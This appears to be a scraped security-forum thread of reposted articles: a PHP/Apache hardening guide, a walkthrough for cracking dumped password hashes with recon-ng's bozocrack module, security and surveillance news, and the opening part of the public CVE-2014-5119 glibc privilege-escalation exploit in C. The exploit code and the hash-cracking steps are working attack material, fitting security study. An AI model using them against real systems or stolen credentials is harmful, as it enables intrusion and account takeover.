select csname, @{LABEL='LastBootUpTime';EXPRESSION={$_.ConverttoDateTime($_.lastbootuptime)}} or, in wmic: wmic get os last bootuptime or, if you have sysinternals available, you can just run "uptime" What does this mean for folks concerned with PCI compliance? Today, not so much. Lots of environments are still operating under PCI 2.0. PCI 3.0 simply calls for education on the topic of good coding practices to combat memory scraping. Requirement 6.5 phrases this as "Train developers in secure coding techniques, including how to avoid common coding vulnerabilities, and understanding how sensitive data is handled in memory. Develop applications based on secure coding guidelines." Personally (and this is just my opinion), I would expect/hope that the next version of PCI will call out encryption of card and personal information in memory specifically as a requirement. If things play out that way, What this will mean to the industry is that either: a/ folks will need to move to card readers that encrypt before the information is on the POS terminal or b/ if they are using this info to collect sales / demographic information, they might instead tokenize the CC data for the database, and scrub it from memory immediately after. All I can say to that approach is "good luck". Memory management is usually abstracted from the programming language, so I'm not sure how successful you'd be in trying to scrub artifacts of this type from memory. =============== Rob VandenBrink, Metafore Sursa: https://isc.sans.edu/forums/diary//18579
-
[h=1]OWASP A6 – Security Misconfiguration with PHP[/h] By codewatch On November 20, 2011 · 1 Comment This will be another non-development related post. I am going to cover security configuration of the operating system, web server, and PHP environment for your web applications. It doesn’t matter how secure your application is if the OS, web server, or PHP configuration is insecure. I am not going to cover full hardening of your servers, but rather some general guidelines along with some specific configuration settings for PHP and Apache. General guidance on server deployment for your application environment: Apply all security related patches to the operating system and services in use. Make sure that Apache and PHP are fully patched. Apply a security best practice standard, deviating only when necessary. CIS is a good choice here because of their depth of configuration standards. Use security best practice standards for the OS as well as Apache. Change default passwords for all accounts. Use a long and strong password for service and administrative accounts. Disable or remove all unnecessary protocols, accounts, scripts, processes, and services. Perform vulnerability scans, web application scans, and network and application level penetration tests against your systems on a regular basis. Configure servers to log all security related events and to forward those events to a centralized security information management system. Configure applications to only display generic error messages. Perform administrative actions using unprivileged accounts. Use the “Run As” feature of Windows or the sudo feature of Linux to perform privileged operations on servers. The above suggestions will help ensure that your system is patched and the OS is configured securely. Apache must be configured securely as well to limit the servers exposure to risk. General Apache recommendations: Compile Apache with the minimum amount of modules and features required to run your application(s). I suggest the following directives be run as part of the configuration at a minimum: –enable-headers, –enable-expires, –enable-ssl, –enable-rewrite, –disable-status, –disable-asis, –disable-autoindex, –disable-userdir. The enable settings ensure that you can configure the server to timeout sessions and send other security related responses, support connections over SSL, and rewrite requests to prevent specific HTTP methods. The options for disabling features prevents information disclosure issues within the Apache web server. Remove all default scripts from the /cgi-bin directory. Create an apache user and group with minimal permissions. Run apache as this user and change ownership of all files served by Apache to this user and group with minimal permissions (in Linux: chown -R apache.apache /path/to/web/directory, chmod -R 644 /path/to/web/directory, then chmod 744 for all directories under the web directory). Consider installing and configuring ModSecurity. Specific Apache web server configuration suggestions follow. Configure httpd.conf so that the server doesn’t report full version and module information: ServerTokens Prod ServerSignature Off Configure the server to use an unprivileged user account and group: User apache Group apache Load the least amount of modules possible for your environment, our server is set to: LoadModule php5_module /usr/modules/libphp5.so LoadModule security2_module /usr/modules/mod_security2.so LoadModule unique_id_module /usr/modules/mod_unique_id.so Disable the use of unnecessary and potentially dangerous HTTP/WebDAV methods: <Directory /> <Limit OPTIONS PUT CONNECT PATCH PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK DELETE TRACK> Order deny,allow Deny from all </Limit> Options None AllowOverride None Order deny,allow Deny from all </Directory> <Directory "/var/www/htdocs"> <Limit OPTIONS PUT CONNECT PATCH PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK DELETE TRACK> Order deny,allow Deny from all </Limit> Options None AllowOverride None Order allow,deny Allow from all <Directory> Disable support for all but specifically allowed file extensions: // Match all files and deny <FilesMatch "^.*\.[a-zA-Z0-9]+$"> Order deny,allow Deny from all </FilesMatch> // Allow specific file extensions <FilesMatch "^.*\.(ico|css|tpl|wsdl|html|htm|JS|js|pdf|doc|xml|gif|jpg|jpe?g|png|php)$"> Order deny,allow Allow from all </FilesMatch> Log errors: ErrorLog "/var/log/apache/error_log" LogLevel notice LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined LogFormat "%h %l %u %t \"%r\" %>s %b" combined CustomLog "/var/log/apache/access_log" combined Disable access to the cgi-bin directory: <Directory "/usr/local/apache/cgi-bin"> AllowOverride None Options None Order deny,allow Deny from all </Directory> Block the TRACE and TRACK HTTP Methods (must be added to each virtual host): RewriteEngine On RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK) RewriteRule .* - [F] Block anything other than HTTP 1.1 traffic: RewriteCond %{THE_REQUEST} !HTTP/1\.1$ RewriteRule .* - [F] Applications that require authentication should require SSL for the entire session. The following configuration directive will redirect requests to http://myapp.mysite.com to HTTPS: RewriteCond %{HTTPS} off RewriteRule (myapp.mysite.com.*) https://%{HTTP_HOST}%{REQUEST_URI} In your ssl configuration file, require SSLv3 or TLS, and only strong encryption protocols: SSLProtocol -ALL +SSLv3 +TLSv1 SSLCipherSuite HIGH:!ADH If you cannot use the –disable-userdir and –disable-status options during Apache compilation, then add the following directives to your Apache configuration to prevent unnecessary information disclosure related to these modules: UserDir Disabled ExtendedStatus Off If you cannot use the –disable-autoindex option during Apache compilation, then add the following directive to each <Directory> setting in your Apache configuration to prevent auto indexing of directories and leakage of directory contents: Options -Indexes Finally, PHP must be configured securely to ensure the protection of your application and company/customer data. General PHP recommendations: Compile PHP with the minimum amount of modules and features required to run your application(s). I suggest the following directives be run as part of the configuration at a minimum: –with-openssl and –with-mcrypt. This will ensure that you can leverage encryption routines within your application to protect data and passwords. Protect the PHP session directory. Place session data in a temporary directory and then apply the most restrictive permissions possible to the folder. The folder can be owned by the root user and the apache group. Place third-party PHP libraries used within your applications in a directory outside of the main web directory (/htdocs) If possible, apply the PHP Suhosin patch to PHP to provide additional security to the scripting language core. Specific PHP configuration suggestions follow. Configure php.ini to prevent Denial of Service (DoS) conditions (adjust these settings based on the needs of your application): // Maximum time a script can execute max_execution_time = 30 // Maximum time a script can spend parsing request data max_input_time = 7200 // Max memory a script can consume memory_limit = 128M // Limit the amount of data that can be POSTed to the // server. This affects file uploads as well. post_max_size = 4M // Limit the maximum size of a file uploaded to the server. upload_max_filesize = 4M // Limit the number of files that can be uploaded at a // single time. max_file_uploads = 10 Enable logging but disable displaying logs to application users: error_reporting = E_ALL & ~E_DEPRECATED display_errors = Off display_startup_errors = Off log_errors = On log_errors_max_len = 1024 // Do not ignore errors, log them all ignore_repeated_errors = Off ignore_repeated_source = Off Set specific mime types and content types to help prevent encoding, decoding, and other canonicalization issues that can result in successful XSS attacks: default_mimetype = "text/html" default_charset = "ISO-8859-1" Place third-party PHP applications in a path outside of the /htdocs directory: include_path = ".:/usr/local/apache/phpincludes" Implement strong protection of PHP sessions: // Save sessions as files in a specific directory session.save_handler = files session.save_path = "/tmp/phpsessions" // Require the use of cookies to prevent session // ID's from being included in URL's session.use_cookies = 1 session.use_only_cookies = 1 session.use_trans_sid = 0 // Set the "secure" and "httponly" flags on the // cookie. This will prevent the cookie from // being sent over an HTTP connection or being // accessed by JavaScript, helping prevent // session hijacking attacks via XSS. session.cookie_secure = true session.cookie_httponly = true // Set cookie path and domain information to // limit where the cookie can be used, thus // protecting session data. session.cookie_path = /codewatch/ session.cookie_domain = www.codewatch.org // Set the cookie to delete once the browser // is closed. session.cookie_lifetime = 0 // Perform garbage collection on session data // after 15 minutes of inactivity. session.gc_maxlifetime = 900 // Use a secure source for generating random // session ID's (set to a non-zero value // on Windows systems. session.entropy_file = /dev/urandom // Use a strong hashing algorithm to create // the session ID and use as many characters // as possible to reduce the likeliness that // the session ID can be guessed or hijacked. session.hash_function = 'sha512' session.hash_bits_per_character = 6 // Send the nocache directive in HTTP(S) // responses to ensure the page can't be // cached. In addition, set the time-to- // live for the page to a low value. session.cache_limiter = nocache session.cache_expire = 15 Disable the ability for PHP to interpret a URL as a file to help prevent some types of remote file include attacks: allow_url_fopen = Off allow_url_include = Off Disable registration of globals, long arrays, and the argc/argv variables (more information and the reason behind this suggestion can be found here, here, and here).: register_globals = Off register_long_arrays = Off register_argc_argv = Off Following these guidelines and configuration settings should go a long way towards ensuring the security of your web and application servers, company and customer data, and the integrity of your systems. Sursa: https://www.codewatch.org/blog/?p=190
-
[h=3]"Cracking" Hashes with recon-ng and bozocrack[/h]The other day I came across a database dump that had user login names and hashed passwords. I had over 1,000 of them and they were SHA256 hashes. I remembered that there was some tool that could perform Google look-ups for hashes and asked the Twitter-verse for help. Wouldn't you know that the first person to reply was Tim Tomes who said that the bozocrack module inside recon-ng could do exactly what I wanted. Excellent! This blog post is a walk-through of that process. [h=3]Pulling our Hashes from a File[/h] First thing we need to do is get the hashes. Let's say I have all my hashes in a files called, oh I don't know "hashes" and I'll put them on the Desktop of my Kali linux system. So the file will be located at /root/Desktop/hashes. Launch recon-ng and create a workspace named "hashes" (or whatever you want) for this work. Workspaces allow us to logically partition our work so that if we have several projects or customers that we are doing work for simultaneously, their data doesn't get co -mingled. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]recon-ng launched from inside a terminal[/TD] [/TR] [/TABLE] Now let's tell recon-ng to load the bozocrack module. Since it is the only module with "bozo" in it, we can use a shortcut and just type load bozo as shown below. I also used the show info command to get information about the module I just loaded. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Loading the bozocrack module and showing the info[/TD] [/TR] [/TABLE] The important part of this step is to see all of the options that you can configure. In this case the SOURCE variable is the only option to modify. By default, the module pulls information from the credentials table inside the recon-ng database. But we can tell it to use a different location as the source of our hashes. Let's do that first. We know from above that our file with the hashes is at /root/Desktop/hashes. We change where the module looks for the source using the set command: set SOURCE /root/Desktop/hashes (as shown below). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]All set to run the bozocrack module using the hashes file[/TD] [/TR] [/TABLE] At this point, we just type run and grab a $cold_beverage. The module will make Google queries for each hash in the file you specified and it'll display the results on the screen. Below is what mine looked like once it finished. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]bozocrack module output[/TD] [/TR] [/TABLE] You can see that the hashes it found a match for start with a green "splat"/asterix [*]. Also note that there were three types of hashes in my file: MD5, SHA1, and SHA256. Pretty cool that the module just took them all and didn't make me separate them into separate files. +1 for recon-ng So that is the easy way for doing the lookups. You can easily scrape the terminal window screen and copy all the found hashes into a text editor for post-processing. That works....but I'm a lazy guy. I like to have my tools do the work. So, let's do it another way too. [h=3]Using the Internal DB[/h] As I mentioned above, recon-ng maintains a database for its findings. To see all the tables and such, type show schema and they will appear. We are going to be storing our password hashes in the hash column of the credentials table. First thing I do is to import all my hashes into the DB using the import/csv_file module. Just type use import/csv and hit enter (since the csv_file is the only file with CSV in it inside the import path, you don't have to complete the whole name. Like I said, I'm lazy!). Again I like doing a show info to see what options there are. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Import/csv_file module[/TD] [/TR] [/TABLE] OK, so we need to set the FILENAME option (set FILENAME /root/Desktop/hashes) and also the TABLE (set TABLE credentials). Now that we have those fields entered, if we do another show info we can see that there is now another option to change. See the "CSV_####..." column in the picture below? recon-ng is telling us it found content and wants to know where to put it. So we type set CSV_[ENTERTHENUMBER] hash as shown below. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Import/csv_file module with column recognized[/TD] [/TR] [/TABLE] Now we have to go back to the bozocrack module (load bozocrack). Since we ran the module already using the SOURCE of a file, we'll need to switch from the file for the SOURCE to the default (set SOURCE default) as the default uses the contents of the DB. Oh, want to check if your hashes loaded OK? Type show credentials and you'll see the hashes in their proper column (below). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Credentials table before bozocrack[/TD] [/TR] [/TABLE] OK, let's kick this off using the run command and let 'er rip. We will see the same output from when we ran the bozocrack module above but this time the bozocrack module will store the results in the DB. To show this, just type show credentials again and you should see more of the columns filled out (like the pic below). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Credentials table after bozocrack[/TD] [/TR] [/TABLE] Yay! We got them in the DB but how to we get them out? Of course there is a module for that. Type load reporting/csv to load that module. show info will tell you what options there are. We see (below) that we need to alter the FILENAME (set FILENAME /root/Desktop/recon-ng_hashes_out) and TABLE (set TABLE credentials) and then type run. Magic! [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Using the reporting/csv output module[/TD] [/TR] [/TABLE] On your desktop should be a CSV file with your hashes, what type of hashes they are, and the cleartext passwords in it (like the one below). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Exported CSV report from recon-ng[/TD] [/TR] [/TABLE] Hope this was helpful! Sursa: Hacking and Hiking: "Cracking" Hashes with recon-ng and bozocrack
-
[h=1]Pastebin Pastes Collection[/h] [h=1]This Just In (more)[/h] Pastebin.com scraped pastes 2014-07-01 57 days ago Pastebin.com scraped pastes 2014-06-30 58 days ago Pastebin.com scraped pastes 2014-06-29 59 days ago Pastebin.com scraped pastes 2014-06-28 60 days ago Pastebin.com scraped pastes 2014-06-27 61 days ago Poate gasiti ceva interesant. Sursa: https://archive.org/details/pastebinpastes
-
[h=2]How your cat could be used to hack neighbors' Wi-Fi[/h]Wednesday - 8/13/2014, 8:50am ET By Neal Augenstein WASHINGTON -- Coco looks and acts like a cat -- and hackers could exploit that. Gene Bransfield, a principal security engineer at Tenacity Solutions, Inc., in Reston, Virginia, outfitted the Siamese cat with a custom-made collar that mapped dozens of neighbors' Wi-Fi networks. As reported in Wired, Bransfield outfitted a cat collar with a Spark Core chip loaded with his custom-coded firmware, a Wi-Fi card, a tiny GPS module, and a battery. The customized collar allowed Bransfield to map all the Wi-Fi networks in the neighborhood, which could also be done by a home intruder or a person intent on stealing a home's Wi-Fi. The project was jokingly entitled "War Kitteh," and Branfield's presentation at last weekend's DefCon hacker conference in Las Vegas was entitled "How to Weaponize Your Pets." Bransfield says his goal wasn't to create dangerous house pets, but to make users aware of privacy issues and entertain the group's hacker audience. "My intent was not to show people where to get free Wi-Fi," says Bransfield, "but the result of this cat research was that there were a lot more open and WEP- encrypted hot spots out there than there should be in 2014." [h=3]Updating an old hacking technique[/h] In the 1980s, hackers looked for unprotected computers by "wardialing" -- cycling through numbers with their modems. After the advent of Wi-Fi, "wardriving" saw hackers attaching an antenna to a car and driving through the city looking for weak and unprotected networks. Bransfield says he built the "War Kitteh" collar for less than $100, and it became easier in the past months, when the Spark Core chip became easier to program, Wired reports. Bransfield doesn't own a cat. Coco is his wife's grandmother's cat. In a three-hour walk through the neighborhood, Coco found 23 Wi-Fi hot spots, more than one-third of which were open to snoops with the simpler-to-crack WEP instead of the more modern WPA encryption. Bransfield says many of the WEP connections were Verizon FiOS routers with their default settings left unchanged. Sursa: How your cat could be used to hack neighbors' Wi-Fi - WTOP.com
-
[h=1]Critical Bug Combo in New Google Chrome 37 Stable Earns Researcher $30,000 (€22,750)[/h] August 26th, 2014, 20:59 GMT · By Ionut Ilascu Google promoted its Chrome browser to a new stable revision, 37.0.2062.94, which integrates a total of 50 security fixes, and one of the bug hunters received a $30,000 / €22,750 reward for disclosing a combination of vulnerabilities that led to remote code execution outside the sandbox. The bug hunter, identified as lokihardt@asrt, found glitches in V8, Chrome’s JavaScript engine, the Inter-process Communication (IPC), the data synchronization component and extensions, which combined provided a potential attacker the possibility to run arbitrary code on the targeted machine. Apart from this reward, Google also paid $13,000 / €9,850 to other researchers, for use-after-free vulnerabilities in DOM, SVG and bindings, spoofing of the extension permission dialog, uninitialized memory read in WebGL and Web Audio, and for an issue related to extension debugging. An additional $8,000 / €6,065 was paid by the company to researchers that worked with the Chrome development team on making sure that some security bugs never made it to the stable version of the web browser. Google’s own security team also discovered glitches based on internal audits, fuzzing and other types of activities. Address Sanitizer tool, a memory error detection utility, was used for the discovery of many of the security bugs fixed in this revision. Sursa: Critical Bug Combo in New Google Chrome 37 Stable Earns Researcher $30,000 (€22,750)
-
Beantown's Big Brother: How Boston Police Used Facial Recognition Technology to Spy on Thousands of Music Festival Attendees Longreads Or Whatever By Luke O'Neil Although we look back on it now through a mournful or angry lens, it's easy to forget just how downright disorienting the days and weeks following the Boston Marathon bombing in April of 2013 were. Adding to the surrealism of the drama for me was a night spent on lockdown in my Watertown home while the gun fight between authorities and the alleged bomber raged on blocks away, and the intrusion of heavily armed law enforcement trampling through my front yard during the next morning's manhunt. For weeks after in the city, riding the subway or at any sort of big event, a sense of unease would sneak up on me from time to time when I realized just how easy it would be for something like the bombing to happen again. You might forgive someone attending the Boston Calling music festival at Government Center about a month later, a now twice-yearly, extremely successful event, for feeling somewhat apprehensive. It was, after all, the first large gathering of thousands of spectators since the bombing. But, as a recent investigation published in the alt-weekly Dig Boston has uncovered, perhaps concertgoers like myself needn't have worried so much; after all, the city was watching our every movement. I remarked at the time, in writing reviews of the concert in May, as well as on the follow up that took place in September, just how refreshing it was to experience a large-scale music festival like this in the heart of the city without an overbearing security presence. Yes, there were bag checks, and police stationed throughout, but at nowhere near the high-alert style numbers you might have expected. Instead of feeling unsafe, the resumption of something resembling normal life without an overreactive militarized-style doubling-down was liberating. It felt like the city was treating us like adults, which, as anyone who's been to big concerts or sporting events around here will tell you, isn't necessarily the normal routine. As a music critic who typically avoids festivals at all costs, it was a big part of what made me able to enjoy myself at this one in particular. One of the reasons for a less physically imposing police presence may have been that the city was in the process of testing a pilot program for a massive facial recognition surveillance system on everyone at the concerts in both May and September. Using software provided by IBM that utilized existing security cameras throughout the area, the city tracked the thousands of attendees at the concert and in the vicinity, and filtered their appearance into data points which could then be cross-checked against certain identifying characteristics. And then... Well, what happens next is what makes this sort of thing so potentially troubling. Slides provided to me by the Dig's Chris Faraone show how the system was meant to work, with the software capable of distinguishing people by such characteristics as baldness, eyeglasses, skin tone, torso texture, and beards which, considering this was an indie rock concert may have overloaded their servers. The data would then be transmitted to a hub, where city representatives, Boston Police, and IBM support staff could watch in real time, all while simultaneously monitoring social media key words related to the event. The purpose, ostensibly, was being able to pick up on suspicious activity as it was happening, for example “alerting when a person loiters near a doorway as they would if trying to gain entrance,” the slides explain, or alerting of “attempts to climb perimeter barricade,” or an “abandoned object near barricade.” These seem like worthwhile things to be on the lookout for, but among the capabilities was one that seems particularly egregious and questionably necessary: “Face Capture of every person who approaches the door.” From IBM's Powerpoint document on facial recognition analytics. The Boston Police Department denied having had anything to do with the initiative, but images provided to me by Kenneth Lipp, the journalist who uncovered the files, show Boston police within the monitoring station being instructed on its use by IBM staff. The implementation of such a system so closely following the bombings may seem arguably justified, but it's important to remember just how much was made of facial recognition software's ineffectiveness when it came to identifying the bombers Tamerlan and Dzhokhar Tsarnaev themselves. Despite the fact that both men's images were captured on security cameras on the day of the bombing, and that their identities were known to law enforcement, technology was incapable of coming up with a match. “The technology came up empty even though both Tsarnaevs’ images exist in official databases: Dzhokhar had a Massachusetts driver’s license; the brothers had legally immigrated; and Tamerlan had been the subject of some FBI investigation,” the Washington Post reported at the time. Instead, it was traditional police work, eye witnesses, tips from people who recognized them and so on, that gave the police and federal agents the information they needed. So what made the city think things would be any different this time? The shortcomings of facial recognition software of the kind being tested out at Boston Calling, and implemented in other cities throughout the world, notably in New York City post-9/11 and everywhere throughout London, not to mention increasingly in retail stores throughout the country, are well documented. Too often, the images captured are rendered less effective by different facial expressions, facial hair, hats, the angle at which they were taken and so on. Face painting, interestingly, has also been shown to stymie cameras, something that might be a particular issue at music festivals like this one, where costume trappings have become standard. Surveillance footage, courtesy of Kenneth Lipp at Dig Boston. “This is definitely not the first time that government and private actors have worked together to use people attending an event like that as guinea pigs,” Kade Crockford the Director of the ACLU of Massachusetts Technology for Liberty Project told me. She likens the image capturing going on at the concerts here to a similar story uncovered by the The Intercept recently that showed 15 states, including Massachusetts, have been sharing driver’s license images and data with federal agencies to fill up their already massive terror database and watch lists. Despite the fact that the technology is still imperfect, most observers agree, there is going to come a point soon where it does work—a project in the works from researchers at Facebook has shown that it can match two facial images with 97.25 % accuracy, a fraction smaller than the normal human brain can do, for example. It's imperative we start worrying about what governments can and will do with that capability when the time comes. “It's going to get better and better. As it does, it's not just the FBI, CIA, and government agencies, but also every shopping mall you go into, potentially sports arenas,” Crockford says. “It's going to look a lot like dystopian scenes in the mall in the film Minority Report.” Like in so many other areas, the technology here is moving faster than the legislature and the courts. “We really need to get a handle on what exactly government agencies are doing. Not just thinking about it, but actually acting on public concerns about how this technology is going to be used against us, and actually passing laws that restrict some of the ways.” It's important to point out that none of this would've even come to light if not for the sleuthing of the reporters at the Dig, including Lipp, who stumbled across the IBM documents and agreements with the City of Boston on how to implement the software on an unsecured server left out in the open by an IBM employee. He's found similar troves of information regarding programs like these in Chicago and New York City, and evidence of IBM instituting similar programs in Scotland, Israel, Puerto Rico, Pakistan, and New Jersey. “In the case of Boston, what's very concerning is how recklessly they tested something on the public carte blanche, predicated on this Never Forget thing, post-9/11 thing,” Lipp says. “The really disturbing thing to me is that all of us this is being ushered in under the umbrella of Smart Cities. What it means to me is cities using integrated surveillance, having tech partners that establish themselves as contractors in the city by putting their hardware in the infrastructure. Once they have infrastructure in place, they can apply any of the software they want to it.” When reached for comment, Boston Calling explained their involvement with the program: "City of Boston public safety officials contacted us in advance of our May 2013 festival to tell us they would be testing a new surveillance system as an extra safety measure. Boston Calling Music Festival was not involved in the implementation of the program. Our practice is to comply with all public safety initiatives the city chooses to implement. Fan safety is our number one priority." In the demonstration for Boston there were “only” 13 cameras used, but there were 200 they could have brought online. Even worse is what happened to the data after the project was complete. The mayor's office, who haven't responded to my requests for comment, released a statement admitting to the program. (The program was conducted under former mayor Tom Menino's administration, not recently elected Martin Walsh). The idea is simple logistics, they say. Nothing to worry about here. “The purpose of the pilot was to evaluate software that could make it easier for the City to host large, public events, looking at challenges such as permitting, basic services, crowd and traffic management, public safety, and citizen engagement through social media and other channels. These were technology demonstrations utilizing pre-existing hardware (cameras) and data storage systems,” it read in part. “The City of Boston did not pursue long-term use of this software or enter into a contract to utilize this software on a permanent basis,” it goes on. But, it says, they remain open to the potential for other similar situations. Among their concerns, they say, are legal and privacy issues. Oh, you think? Demo of IBM software detecting person of interest. Even those who might not begrudge a city for keeping an alert eye on a big event like a music festival, particularly coming on the heels of a terrorist attack, can likely agree that it's what happens with the data after it's been determined to be of no use. You don't have to be overly paranoid to suspect, as we've seen with the NSA revelations uncovered by Edward Snowden, that once data is collected, it isn't often deleted. In fact, Lipp says, he was able to uncover 70 hours of footage from the concert still online up until last week when they published their story. Similarly, he's easily found his way into lightly secured reams of documents that include Boston parking permit info, including drivers’ licenses, addresses, and other data, kept online on unsecured FTP servers. “If I were a different kind of actor, a malicious state actor, I could pose a significant threat to the people of Boston because of what I have in the folder.” “It's an astounding level of stupidity as far as IBM's control over the data,” Crockford says. “When we're talking about numerous government agencies having access to this, as well as corporations, whether they're contractors, or ones that sit next to police officers at so-called fusion centers, we really have to be concerned. How many people have access to this server on which all this data sits?” It's not as if law enforcement in Boston has shown the best judgment when it comes to the type of people being observed. Earlier this summer, over a thousand pages of notes compiled by the Boston Regional Intelligence Center on the activities of Occupy Boston members were uncovered, including absurdly minute details such as the comings and goings of local bands, down to the ticket prices of shows. You may also recall when authorities in Boston were going undercover online pretending to be punk rock fans in order to smoke out the locations of DIY house shows, or “concerts.” Even worse, all of this was done in secret. “The city did nothing to disclose this, there were no city council hearings to ask whether it should be done,” Crockford says of the facial recognition tests. “It's perfectly demonstrative of how surveillance policy manifests with government agencies deciding behind closed doors to spend a lot of money spying on innocent people, and nobody is told about it.” It's enough to make one wonder what else is going on that we don't know about. Personally, I can't help but be curious how many times I showed up on the cameras myself at the concerts, moving throughout the grounds. Did they watch me dancing to Passion Pit, or swooning to Marina and the Diamonds? And for what? What is it that made me and everyone else there a person of interest to the city of Boston other than our desire to come together with the rest of the city to enjoy a day of music? Following a few of the worst days in this city's history, we were treated to one of the funner ones of the year at Boston Calling, but the fact that we were all being spied on at the time has spoiled my memory of even that. It's made all the worse because a big reason why we go to concerts in the first place is to be able to divest ourselves of our identities, to lose ourselves, literally and figuratively speaking, in the throng of the crowd. That's starting to see less possible every passing day. Luke O'Neil is on Twitter, where his tweets are being monitored. - @lukeoneil47 Sursa: Beantown's Big Brother: How Boston Police Used Facial Recognition Technology to Spy on Thousands of Music Festival Attendees | NOISEY
-
[h=1]glibc Off-by-One NUL Byte gconv_translit_find Exploit[/h] //// Full Exploit: http://www.exploit-db.com/sploits/CVE-2014-5119.tar.gz // // // --------------------------------------------------- // CVE-2014-5119 glibc __gconv_translit_find() exploit // ------------------------ taviso & scarybeasts ----- // // Tavis Ormandy <taviso@cmpxhg8b.com> // Chris Evans <scarybeasts@gmail.com> // // Monday 25th August, 2014 // #define _GNU_SOURCE #include <err.h> #include <stdio.h> #include <fcntl.h> #include <errno.h> #include <dlfcn.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <stdint.h> #include <assert.h> #include <stdarg.h> #include <stddef.h> #include <signal.h> #include <string.h> #include <termios.h> #include <stdbool.h> #include <sys/user.h> #include <sys/stat.h> #include <sys/ioctl.h> #include <sys/types.h> #include <sys/ptrace.h> #include <sys/utsname.h> #include <sys/resource.h> // Minimal environment to trigger corruption in __gconv_translit_find(). static char * const kCorruptCharsetEnviron[] = { "CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", NULL, }; static const struct rlimit kRlimMax = { .rlim_cur = RLIM_INFINITY, .rlim_max = RLIM_INFINITY, }; static const struct rlimit kRlimMin = { .rlim_cur = 1, .rlim_max = 1, }; // A malloc chunk header. typedef struct { size_t prev_size; size_t size; uintptr_t fd; uintptr_t bk; uintptr_t fd_nextsize; uintptr_t bk_nextsize; } mchunk_t; // A tls_dtor_list node. typedef struct { uintptr_t func; uintptr_t obj; uintptr_t map; uintptr_t next; } dlist_t; // The known_trans structure glibc uses for transliteration modules. typedef struct { uint8_t info[32]; char *fname; void *handle; int open_count; } known_t; enum { LOG_DEBUG, LOG_WARN, LOG_ERROR, LOG_FATAL, }; // Round up an integer to the next PAGE_SIZE boundary. static inline uintptr_t next_page_size(uintptr_t size) { return (size + PAGE_SIZE - 1) & PAGE_MASK; } // Allocate a buffer of specified length, starting with s, containing c, terminated with t. static void * alloc_repeated_string(size_t length, int s, int c, int t) { return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1); } static void logmessage(int level, const char * format, ...) { va_list ap; switch (level) { case LOG_DEBUG: fprintf(stderr, " [*] "); break; case LOG_WARN: fprintf(stderr, " [*] "); break; case LOG_ERROR: fprintf(stderr, "[!] "); break; } va_start(ap, format); vfprintf(stderr, format, ap); va_end(ap); fputc('\n', stderr); if (level == LOG_ERROR) { _exit(EXIT_FAILURE); } } // Parse a libc malloc assertion message to extract useful pointers. // // Note, this isn't to defeat ASLR, it just makes it more portable across // different system configurations. ASLR is already nullified using rlimits, // although technically even that isn't necessary. static int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr) { FILE *pty; char *mallocerror; char *memorymap; char *line; char *prev; char message[1 << 14]; char *anon = NULL; char r, w, x, s; ssize_t count; int status; uintptr_t mapstart; uintptr_t mapend; // Unfortunately, glibc writes it's error messaged to /dev/tty. This cannot // be changed in setuid programs, so this wrapper catches tty output. while (true) { // Reset any previous output. memset(message, 0, sizeof message); logmessage(LOG_DEBUG, "Attempting to invoke pseudo-pty helper (this will take a few seconds)..."); if ((pty = popen("./pty", "r")) == NULL) { logmessage(LOG_ERROR, "failed to execute pseudo-pty helper utility, cannot continue"); } if ((count = fread(message, 1, sizeof message, pty)) <= 0) { logmessage(LOG_ERROR, "failed to read output from pseudo-pty helper, %d (%m)", count, message); } logmessage(LOG_DEBUG, "Read %u bytes of output from pseudo-pty helper, parsing...", count); pclose(pty); mallocerror = strstr(message, "corrupted double-linked list"); memorymap = strstr(message, "======= Memory map: ========"); // Unfortunately this isn't reliable, keep trying until it works. if (mallocerror == NULL || memorymap == NULL) { logmessage(LOG_WARN, "expected output missing (this is normal), trying again..."); continue; } logmessage(LOG_DEBUG, "pseudo-pty helper succeeded"); break; } *baseaddr = 0; *chunkptr = 0; *bssaddr = 0; *libcaddr = 0; logmessage(LOG_DEBUG, "attempting to parse libc fatal error message..."); // Verify this is a message we understand. if (!mallocerror || !memorymap) { logmessage(LOG_ERROR, "unable to locate required error messages in crash dump"); } // First, find the chunk pointer that malloc doesn't like if (sscanf(mallocerror, "corrupted double-linked list: %p ***", chunkptr) != 1) { logmessage(LOG_ERROR, "having trouble parsing this error message: %.20s", mallocerror); }; logmessage(LOG_DEBUG, "discovered chunk pointer from `%.20s...`, => %p", mallocerror, *chunkptr); logmessage(LOG_DEBUG, "attempting to parse the libc maps dump..."); // Second, parse maps. for (prev = line = memorymap; line = strtok(line, "\n"); prev = line, line = NULL) { char filename[32]; // Reset filename. memset(filename, 0, sizeof filename); // Just ignore the banner printed by glibc. if (strcmp(line, "======= Memory map: ========") == 0) { continue; } if (sscanf(line, "%08x-%08x %c%c%c%c %*8x %*s %*u %31s", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) { // Record the last seen 